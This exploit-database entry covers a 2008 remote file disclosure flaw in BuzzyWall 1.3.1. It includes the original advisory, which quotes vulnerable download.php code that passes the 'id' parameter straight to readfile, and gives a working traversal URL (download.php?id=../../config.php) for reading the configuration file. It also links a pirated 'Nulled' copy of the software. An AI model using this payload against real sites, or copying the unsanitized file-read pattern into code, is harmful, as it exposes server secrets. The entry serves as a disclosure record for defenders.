BuzzyWall Remote File Disclosure Vulnerability

vendor:

BuzzyWall

by:

b3hz4d

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: BuzzyWall

Affected Version From: 1.3.2001

Affected Version To: 1.3.2001

Patch Exists: NO

Related CWE: N/A

CPE: a:buzzywall:buzzywall:1.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BuzzyWall Remote File Disclosure Vulnerability

BuzzyWall is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains a maliciously crafted parameter value which can be used to disclose sensitive information from the server. The vulnerable parameter is 'id' which is used to specify the file to be downloaded. An attacker can use directory traversal techniques to access sensitive files outside the web root directory.

Mitigation:

The application should validate user input and restrict access to sensitive files outside the web root directory.

Source

Exploit-DB raw data:

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +        BuzzyWall Remote File Disclosure Vulnerability              +
        +                                                                    +
        +                     Discovered by b3hz4d                           +
        +                                                                    +
        +                     WwW.DeltaHacking.Net                           +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


		
AUTHOR : b3hz4d
DATE   : 25 oct 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION : BuzzyWall
DOWNLOAD    : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
VENDOR      : http://www.buzzywall.com

#####################################################


[+] vuln    : ./download.php

               
$file_name = $_GET['id']

               $file_path = $weburl."wallpapers/full/".$file_name;

                     .

                     .

                     .

                     .

               readfile("$file_path");

   

[+] Exploit : http://victim.com/download.php?id=../../config.php



##############################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #

##############################################################################

# milw0rm.com [2008-10-24]